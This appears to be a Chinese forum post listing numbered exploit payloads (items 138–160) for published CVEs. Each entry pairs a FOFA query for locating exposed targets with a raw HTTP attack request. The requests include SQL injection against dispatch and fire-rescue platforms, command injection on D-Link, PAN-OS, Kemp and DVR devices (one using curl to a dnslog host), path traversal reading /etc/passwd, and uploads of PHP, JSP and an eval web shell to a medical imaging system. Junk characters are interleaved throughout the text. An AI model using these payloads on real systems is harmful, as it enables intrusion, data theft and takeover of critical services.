Upgrade-Insecure-Requests: 1
) N; F3 r7 b3 M% k# Q# G5 h; d2 j
, r0 z" H8 v  l& M7 }) J( c2 H# h* j; P# |9 k3 ~" g! s, `: c8 C8 g" l
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, D9 C7 |. S* T$ yCVE-2024-2621
  ?* s# M' L. I  S7 Y- XFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& s! M3 I! k  z3 s5 aGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.19 G( H' G+ D+ f3 d, s
Host: x.x.x.x
1 M% [& V4 b1 i3 G5 N+ Y0 }+ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* S, k2 Z6 Z/ _% L1 r, a2 p3 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! T; h! [  T$ U0 O0 v  l8 L- u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 k4 x2 Q! @  L6 [( z$ z
Accept-Encoding: gzip, deflate, br, H4 X# {* ^1 `7 _7 C" y# n  N
Connection: close; Z+ H7 R7 |; U5 M3 [4 S- n. [
Upgrade-Insecure-Requests: 1- j7 J8 \% E4 Q% p) r! u
, B! d0 {3 ?' m# r3 O) {
/ V6 V% k* D$ l) i/ B; l, G
139. 福建科立讯通信指挥调度平台editemedia.php sql注入: ]5 S+ n  G$ z
CVE-2024-2622- z8 F# g) Q6 R: e0 r. H" V( t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 f+ Y6 @. U$ x! O' a% o' b5 D
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.17 i- n/ a. ]5 e/ a( T& D' F
Host: x.x.x.x
9 b+ J* B9 H1 k6 B; B4 @3 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 e2 Z8 ?: x1 p1 {- w: a2 C7 _" X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" @% F) ]! z6 h3 z  x& {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ {' @, j, j! e
Accept-Encoding: gzip, deflate, br
1 B4 A" I% g7 Z4 t  UConnection: close( Q" I1 r0 H2 B
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk5 f. {, u4 Q- i; T0 k9 Y  H4 E
Upgrade-Insecure-Requests: 1( L! F9 s! e0 N' R7 N1 O6 h9 K
) U6 Y, u' r2 {
! M3 r* G# |/ M& Y
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 c0 \7 x5 ~7 k  i9 x" N! L
CVE-2024-25669 _9 u4 u0 S5 b4 B* X6 F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台", r: |9 @2 `  b3 J
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.18 k3 n3 n; B- D' K0 ?: k, `5 k1 ~
Host: x.x.x.x
+ M8 F0 \  y$ l: `2 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: r( ~) p1 q5 o5 v  {# W. I' T: |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. o. E6 H$ P  u0 g. L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  D, \8 s! ~) g, Z" {1 f- k
Accept-Encoding: gzip, deflate, br
, s  {; |" @8 e4 x+ eConnection: close! Y) ]# \  O) R1 _4 u1 \& ]
Cookie: authcode=h8g9; Z4 x" [  f" T9 S2 L9 |
Upgrade-Insecure-Requests: 1
9 ^/ G' z2 z0 n/ I+ r
$ k# `# A% m- m
8 H1 c# C$ c* e7 d& F141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
, t& |, X% w% ]9 _3 z+ K8 ]# Z' gFOFA:body="指挥调度管理平台"5 p. C+ }' b8 N# S* ^: P- u
POST /app/ext/ajax_users.php HTTP/1.1- l" J, D! N& R) R
Host: your-ip
4 i0 b& B- s% |; W+ l7 D8 R* bUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info7 v: \6 O0 @: ?. a5 M+ Q7 k
Content-Type: application/x-www-form-urlencoded
) E! x  C& R7 l3 [% H, w2 p6 D" f$ u- n6 T/ `& d  J

* w# E' l* b4 {dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
0 a! |4 E5 `; p& z* h) V; n. Z4 Y; Q  c" u& V
% T! u5 p5 s3 J) G0 j" M# R
142. CMSV6车辆监控平台系统中存在弱密码0 t1 d3 R4 s& R; x
CVE-2024-29666) g# q& l/ a: a+ c# y) P
FOFA:body="/808gps/"% N/ [8 @1 D* |3 Q; P; T2 e+ o
admin/admin& o. s+ a" Q% V8 V+ ?9 `  y, r
143. Netis WF2780 v2.1.40144 远程命令执行- k; {5 O3 h# A
CVE-2024-25850: m6 Q5 G. l6 V- r2 K4 G
FOFA:title='AP setup' && header='netis'
+ O# x+ n; R$ \: w  vPAYLOAD# }6 q/ |" `: @' Q0 w

( p' H4 Y9 }0 s$ ]4 d: v5 v5 d- W144. D-Link nas_sharing.cgi 命令注入/ c! u5 t6 d2 ?, G
FOFA:app="D_Link-DNS-ShareCenter"
0 h0 x, a8 e! O+ p5 g1 H) Gsystem参数用于传要执行的命令! V4 |# ~; m) y6 X
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1' X" }2 M: w, _6 |- l  B. d
Host: x.x.x.x
2 _5 t4 e) y% p7 A; G; ]User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
, G% i. j) L0 s1 F5 s/ a0 p. IConnection: close
/ v' g! `* O+ [0 Z7 B9 a, oAccept: */*
6 L) I$ p  g& Q4 UAccept-Language: en
* Q7 {' h( @, XAccept-Encoding: gzip0 @( v0 Y. @8 s& ]1 B6 i% G/ a

) V, Y0 [3 [' n$ D$ x2 [8 [( b# i
/ m) o5 p. \" |2 t3 u0 N6 Q3 M145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
' o; S+ A9 e2 l4 ?. I5 H0 KCVE-2024-3400
; ~% N1 D4 q+ u$ C! ^5 D1 S- f0 tFOFA:icon_hash="-631559155"
$ {: y% D0 I: A5 Y( L* ZGET /global-protect/login.esp HTTP/1.1
6 l0 t& L0 U: b8 W' I! uHost: 192.168.30.112:1005
) r* {6 s4 F$ ^. ]" f# E3 }! [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
) R! C* `8 v: ?. }6 wConnection: close
2 Z9 K/ J3 _! Q. g- @" U* H* }Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
* L- Z) S6 y4 p! }* TAccept-Encoding: gzip
) Z& R6 X! H) E  V8 @9 {2 ~7 S, G. z

( _* D% U# O" Z" o3 p3 K* c146. MajorDoMo thumb.php 未授权远程代码执行* b! Q; J$ B6 v2 M
CNVD-2024-02175
7 S/ c8 g) {4 j! ]) \FOFA:app="MajordomoSL"( n% H; q9 l" n0 s( |# r
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1. l  I4 W# z& @8 O7 P/ s
Host: x.x.x.x9 V7 ^3 I: N/ q# i3 I' b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
8 I- V( H$ n1 B& q* h! [4 iAccept-Charset: utf-8
1 r) _, R$ l* Y* I1 d9 BAccept-Encoding: gzip, deflate, {% X# K2 J3 E/ k- h! ]
Connection: close
' w6 S8 ?/ a' U+ d: M/ [6 C0 b9 [/ ~0 `9 Z& ^# N
4 ~- i, X: ^# N  f! \# o8 H' S) T
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历  Y- \& j# x) I- X1 T# ?. g; U
CVE-2024-32399) O0 c5 ~  K9 }! v3 W
FOFA:body="RaidenMAILD"
* m* y' Z. ~( gGET /webeditor/../../../windows/win.ini HTTP/1.15 y( k* P7 c' G
Host: 127.0.0.1:81! f0 ^7 O: k% v. O0 G
Cache-Control: max-age=0
# q4 B. _9 v0 a& T) FConnection: close
% Y+ n0 Z- H, M7 c* ]- D/ Z1 i; I. `: c: e
8 ]9 z0 p9 n) M
148. CrushFTP 认证绕过模板注入
7 V' Q8 J1 [9 k$ ]' j' OCVE-2024-4040/ g0 B6 W2 K/ x# @6 i! A. j9 ?
FOFA:body="CrushFTP"
; x7 t3 |* |1 q+ OPAYLOAD, B$ I: t* `: j9 I2 A
3 I6 I$ Q2 z! l8 J5 e3 W
149. AJ-Report开源数据大屏存在远程命令执行& U. D( a* E2 Z6 S2 M
FOFA:title="AJ-Report"8 p5 D! R" f& J* L
- Y( ^6 l4 M# C4 ~' b
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
# l; R- Q  `; V) vHost: x.x.x.x( u1 x8 X8 R2 d/ {( Q, y& R3 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 f# ?# k6 g5 Y8 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: g! A- F* \. n( y" Q- D% x
Accept-Encoding: gzip, deflate, br- j# M6 w; d9 A; q4 O( B
Accept-Language: zh-CN,zh;q=0.9
& Z) j$ |, P( x5 }$ DContent-Type: application/json;charset=UTF-8
8 f, R3 @0 j- L, j6 KConnection: close
8 I3 D% K& c6 d
* N7 t. \9 f) g3 N5 W# m: b" r; C{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
% a/ P* q' _; i, z0 [- W- F
5 R  Z# Q8 b, O0 K7 d" w$ T150. AJ-Report 1.4.0 认证绕过与远程代码执行# \% K, a; @) P4 Y$ ?6 e
FOFA:title="AJ-Report"1 M& x% \' L) ~$ v1 D4 i3 x
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
3 h2 w9 O& }" n! L* l' y6 {9 ]Host: x.x.x.x
) t1 H3 h$ t0 q7 i- y$ ?) q& ~6 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ Z$ n. D/ X8 H% f) z* PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  h* J2 q+ q0 L6 `& ?
Accept-Encoding: gzip, deflate, br* x0 |5 p- |9 W) A% v$ H
Accept-Language: zh-CN,zh;q=0.9; _6 v0 |3 e( S, {$ @. }6 H; C
Content-Type: application/json;charset=UTF-8
# s7 k7 {. T. {; @Connection: close& z0 s4 w$ x9 i: W' w) q3 E# m
Content-Length: 339
- x+ V' S+ h( W4 M( Z6 ^% ?6 q) y4 B* o4 P
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
5 ~; h* v, N5 ^: K( ^8 {: |& b3 _; U6 K9 ~( R
; y/ s% M; H. A
151. AJ-Report 1.4.1 pageList sql注入
' [+ A, u- \. rFOFA:title="AJ-Report"3 @* ]. H0 \* j2 {4 c. O
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.17 C8 N- N; F) [5 p$ |; g! r2 g
Host: x.x.x.x6 H% q% w6 H/ K& C/ h/ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 N- ^; B2 \: Q+ Y% r& B
Connection: close- `( _" p5 G) z
Accept-Encoding: gzip( ~" O' Z7 E2 P. q& L3 o  k
4 v: {2 Y& j4 l1 x- c: R1 a: e

0 U" r1 Q2 r! Z! N/ L6 G152. Progress Kemp LoadMaster 远程命令执行
3 i- E& F- n8 FCVE-2024-1212
- a- t: X6 d4 x( |) ^LoadMaster <= 7.2.59.2 (GA)
  i, a0 [# Z8 g" P# {& N3 y+ ?9 jLoadMaster<=7.2.54.8 (LTSF)% f4 c9 j) P- s" f3 P5 W9 j
LoadMaster <= 7.2.48.10 (LTS)
" O% @, W' N# TFOFA:body="LoadMaster"
7 A0 ~) U7 Q: Z4 q) }% y2 uJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码% r% \+ a# L) j) A
GET /access/set?param=enableapi&value=1 HTTP/1.1
' Z, P4 r9 a8 ?7 }2 UHost: x.x.x.x5 v7 i1 Z( W4 x! z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1: I" V3 @0 K5 v( T$ P
Connection: close. o' r" T  O, H3 Z8 }
Accept: */*
6 O! s) u4 D3 p; {- T8 [Accept-Language: en1 H: n3 N8 ?# _" w& I
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=) @, x/ {) ^! }  Q0 Q) ]3 A) F& H
Accept-Encoding: gzip
+ P4 z# q3 Q1 ]: J8 p/ N% J/ ^5 I5 s5 i! t1 Z8 @
1 c' m( A( t* i# t4 A
153. gradio任意文件读取
/ a7 h- g/ s9 h0 jCVE-2024-1561FOFA:body="__gradio_mode__"2 n" z  x' S3 }1 |% A
第一步,请求/config文件获取componets的id
( V9 G" T  Z! z! l; chttp://x.x.x.x/config
# M. Q" |5 W9 R2 l" s+ ?5 L
, _+ B- T' i& K! L$ R- h6 e# V3 c3 x, P1 q/ z, N" D$ O1 x# |
第二步,将/etc/passwd的内容写入到一个临时文件7 t: I, v9 K* `
POST /component_server HTTP/1.1
; @3 y) N/ v9 Y7 k" a/ @Host: x.x.x.x- m( H3 ^  }, {. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
/ i+ E0 b& L. h1 n6 YConnection: close
# l0 x  c7 R4 y6 \Content-Length: 115
9 V. C( J% x& z; `Content-Type: application/json
0 i8 H  H# k& u1 I! f: d' `Accept-Encoding: gzip! ?7 \  S' M0 w" l+ a! H# ?* o- @

9 L- O/ L2 S" b! |1 a+ v6 c{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
" r; N( @/ N6 C8 A. d+ J1 E$ l# ~- X0 `4 [
- m- q! t" ^1 t' e$ V
第三步访问
2 u4 z7 c) P8 a7 y3 V+ lhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd7 N7 p; M  H" w9 A

3 h8 g+ ?1 l% L
$ M. Z* B, l7 {' V154. 天维尔消防救援作战调度平台 SQL注入* x2 W2 L, E% B. ?
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"* o6 O/ }' N! ^' Q4 m
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
0 G5 w7 \. }5 w4 wHost: x.x.x.x
; |' J) r9 J# W7 E- U6 k0 v$ zContent-Length: 1069 q. j$ Z* K# V5 @! J: S) N
Cache-Control: max-age=0
. g: E5 H# N* N' I$ L* T% CUpgrade-Insecure-Requests: 1
  Q* h& h# |* |$ ?7 v) bOrigin: http://x.x.x.x
; U. p& N1 z' N& p* Y. D5 L  IContent-Type: application/json
& l3 \$ I- h( b8 @. xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 K+ C3 r( U, C; L6 h9 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% Z5 ~5 l1 i* S; g+ {5 A+ p, F2 i8 W& D
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page! `: T# Q: `+ |: D/ Y5 ]
Accept-Encoding: gzip, deflate. C% z( @; a/ B7 b. M
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
. g9 C6 |& k# @Connection: close2 o4 `8 ?  F) h- w+ H
1 c' h7 T8 }5 j; I2 ~
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
* W) \5 P( ^9 X7 G! f. F9 a$ f3 j
, l! b, S* U4 H
# h8 X$ W$ @4 ?4 o155. 六零导航页 file.php 任意文件上传
3 S6 ~+ M6 Q/ ^0 KCVE-2024-34982
& s, K& J/ @- s4 }4 \6 v$ cFOFA:title=="上网导航 - LyLme Spage"' l2 f/ g. U& M- U# d8 Q! X7 g
POST /include/file.php HTTP/1.1
% p' m2 }4 r8 g1 k6 x; P" a  hHost: x.x.x.x
. O) F" a5 k9 q) DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
1 ~5 B* Q; w; w) Q' {, `( [' _  BConnection: close# t; j/ q4 a9 P; C1 J# _
Content-Length: 232
- [: A& Y' ?. N, r5 z9 eAccept: application/json, text/javascript, */*; q=0.01* T" O. k! x0 r: U/ G
Accept-Encoding: gzip, deflate, br, d: U* k8 b1 W3 f: q4 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 L7 e, s3 |+ f  @* {2 i1 \Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
# U5 J! R" [8 N! nX-Requested-With: XMLHttpRequest
% ]# W& o5 {% v  F$ H/ v) ]9 j2 }) Z& j6 M  x
-----------------------------qttl7vemrsold314zg0f
6 Q% h' k2 {6 g3 W  N, w" FContent-Disposition: form-data; name="file"; filename="test.php"+ J8 |; K: `% ^' v# G! P
Content-Type: image/png
( q/ Z8 ?2 h/ I& ~% v- R# |6 ]* V( B9 v) k% q
<?php phpinfo();unlink(__FILE__);?>" N& |. S) u9 M6 ~/ p8 L0 M
-----------------------------qttl7vemrsold314zg0f--
6 n6 Z+ i; r* b" V! B  i$ h9 k. U: t. x. g% |

6 L9 M; D2 J+ P) O- Z& n( {访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
9 b" x. D' H' v8 [/ l5 r1 V: ], b5 [8 v) A/ F" b, ~
156. TBK DVR-4104/DVR-4216 操作系统命令注入: u: O! C9 P4 y9 U1 f
CVE-2024-3721" H, M+ C% I$ s! o4 Y4 N
FOFA:"Location: /login.rsp"
0 v% G6 a4 `4 ?" t5 j·TBK DVR-4104
  V, H5 k* z; s% y7 e·TBK DVR-4216* h* K$ N$ ?, o, a" ^
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
) E- p7 {5 i+ g" b% ?# ?
! {0 Q9 Y4 r: e: r0 {% @
3 u+ F& \( i% }% H# b$ sPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
- c+ Y3 y0 v; v/ e' t& {Host: x.x.x.x
7 |! p6 A' `, J! RUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ C) l' x7 q* E& L4 n- L# V8 _6 [Connection: close( e  {5 ^8 c! p" f; ?, r
Content-Length: 0
2 T4 C$ Y& [" Q$ z, l2 M0 zCookie: uid=1
# o6 _. c# u; v+ i+ l0 ~/ _+ g4 fAccept-Encoding: gzip
+ E1 `/ _) C: c$ A
! j: D( k& j' _: R7 L; P; z3 l" S9 v% D( p; O+ h
157. 美特CRM upload.jsp 任意文件上传
1 O) \( }: _  s, lCNVD-2023-06971
8 r; O7 a7 F9 v1 @! s0 QFOFA:body="/common/scripts/basic.js"
2 w! i/ D9 Q" r! WPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.11 y& d: j9 e3 }( ?' {, S
Host: x.x.x.x' x' u) \" l8 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36# H1 w/ |1 _* e, v5 Z3 Q
Content-Length: 709
4 d: u0 s6 O. a% F- ?) lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( _" Z+ q2 x) K) w: }$ `  @
Accept-Encoding: gzip, deflate5 m. l1 `4 K( d* s  J% z
Accept-Language: zh-CN,zh;q=0.9
8 l0 ^! f+ y  P0 X3 @8 W9 b  HCache-Control: max-age=0
6 X4 a  s; v* w# r4 `/ I. `  y2 [8 p/ SConnection: close
. @) b/ g6 {' i& H; ?. a, j. ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN. Q6 b8 D, B4 g6 ^& ~! E% I
Upgrade-Insecure-Requests: 12 ^  k: K+ k, S& B/ s6 e3 c. C; @

+ i# p( V* S) N: k------WebKitFormBoundary1imovELzPsfzp5dN& N2 `5 b7 c# t
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
7 X. E6 g- x' X$ ~) s6 NContent-Type: application/octet-stream- \) o0 o  l9 }+ {

$ V1 ^; S" X. }3 {' `- S! L( Bnyhelxrutzwhrsvsrafb& v; h3 }% i5 M9 ]
------WebKitFormBoundary1imovELzPsfzp5dN
' s, y0 {6 ], tContent-Disposition: form-data; name="key"; U$ L* V% r$ Y
. ~: U* g4 D, I. ]
null
) q# q2 Y# h: P/ L' e3 D2 u* u" D! i------WebKitFormBoundary1imovELzPsfzp5dN
, f) N  e7 T! x+ AContent-Disposition: form-data; name="form"
9 J5 a  B: y. L3 X; `
, [% t, I% r! _; u- Tnull
7 g$ M, o4 W* \5 ~% q4 ]------WebKitFormBoundary1imovELzPsfzp5dN
/ A. W4 P/ _" [7 ^Content-Disposition: form-data; name="field"
# m7 M! ]) f, h/ S: M: P' Z! k0 @2 @7 ^+ w0 L
null
; k  S2 e& H0 z  {. }5 Z! M------WebKitFormBoundary1imovELzPsfzp5dN0 V: ?) Y6 ?8 W
Content-Disposition: form-data; name="filetitile"
" I% T0 [2 i% M
/ p$ R" S) z1 e) W  G) Pnull
2 P& ~5 t5 i) T4 b* M------WebKitFormBoundary1imovELzPsfzp5dN
+ b7 V) z( I6 ^, [  ^Content-Disposition: form-data; name="filefolder"% r2 T% v2 z3 u7 o

! r/ ]) w0 g/ Q7 knull
0 E$ V* S: y) z5 ~/ D% p& E' o$ n------WebKitFormBoundary1imovELzPsfzp5dN--1 a# c9 W9 R, {  M5 k
) N) ~: W, T: N

* x, C4 p2 M) n* `- d' D7 N- nhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp) V* N4 w  j( t
1 U& x! N& H  ^# n: k- v
158. Mura-CMS-processAsyncObject存在SQL注入! h) m0 i; J; h
CVE-2024-32640
: I) b' _& J9 @FOFA:"Generator: Masa CMS"
1 e5 \5 u8 F( e( u& ]POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
1 x0 f* u/ D5 `. k6 O2 XHost: {{Hostname}}5 o/ W" C8 f" b& A3 d$ {1 z
Content-Type: application/x-www-form-urlencoded
/ G) T4 w+ m) e* i0 l) v0 L* L3 K. b1 o
object=displayregion&contenthistid=x\'&previewid=12 \) s2 D, i- K. V. z. K
! j2 Q: z' Q1 Z6 C

) F2 h. S/ Y5 t159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传9 _- g; C; Q6 s! {
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
6 s. R$ d7 b7 WPOST /webservices/WebJobUpload.asmx HTTP/1.14 i9 z3 V: H2 Q5 Z: N2 W0 j* ]7 R
Host: x.x.x.x
1 H2 ^4 |/ M. E7 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36- S* M4 c. ^$ M: P' V# z% D6 Q
Content-Length: 1080
: q6 D9 `2 H! qAccept-Encoding: gzip, deflate
1 L! A" u# ~0 pConnection: close
( u" ?2 M1 |: ]+ ^Content-Type: text/xml; charset=utf-89 C/ n2 [5 |" Q* T. }6 H
Soapaction: "http://rainier/jobUpload"
0 c# ~" [+ P$ M( a" ^2 v$ C2 ^( _7 X, j- ^
<?xml version="1.0" encoding="utf-8"?>6 V2 d" J. g6 e8 E& [' S- b4 [
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 F8 Y& B/ E! @4 x: t1 i' \, l% e6 d<soap:Body>
( G+ {. O, M9 f; o( x<jobUpload xmlns="http://rainier">
  T' |9 g* v. M/ m) g<vcode>1</vcode>. O$ |/ F2 x9 a
<subFolder></subFolder>
" P, z7 Y* ^: t* ^<fileName>abcrce.asmx</fileName>
4 D9 c( ~) q! l" r& C! _* S<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
( `, r8 d! g( X</jobUpload>
) }/ x( s$ S. m7 L</soap:Body>
; s7 a/ @1 G! f( F. i# e4 |</soap:Envelope>
2 b) q  Y6 G2 Q* T2 Z2 ?" Q+ e
4 k7 ~. S0 T) o% j; [# p0 I+ N% Y+ T( E4 g3 p1 W" @* K
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
0 v6 V6 ~& w3 D7 E2 Q- }& i7 d7 [$ T+ }: H" i
2 ?; v" h" @+ j
160. Sonatype Nexus Repository 3目录遍历与文件读取$ f+ F/ B. w% C
CVE-2024-4956+ Q6 e/ [. y, s: |0 y  K
FOFA:title="Nexus Repository Manager". z  L% K1 K8 S" F% _: P
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
9 {# @& w& b! p1 G+ a1 k: P+ G$ }Host: x.x.x.x
# @, D8 [$ p% a. z. Z5 rUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
' N: a& c+ Z/ P1 XConnection: close0 M% A$ b( J6 Z
Accept: */*; i2 a# b) w. u# F4 P
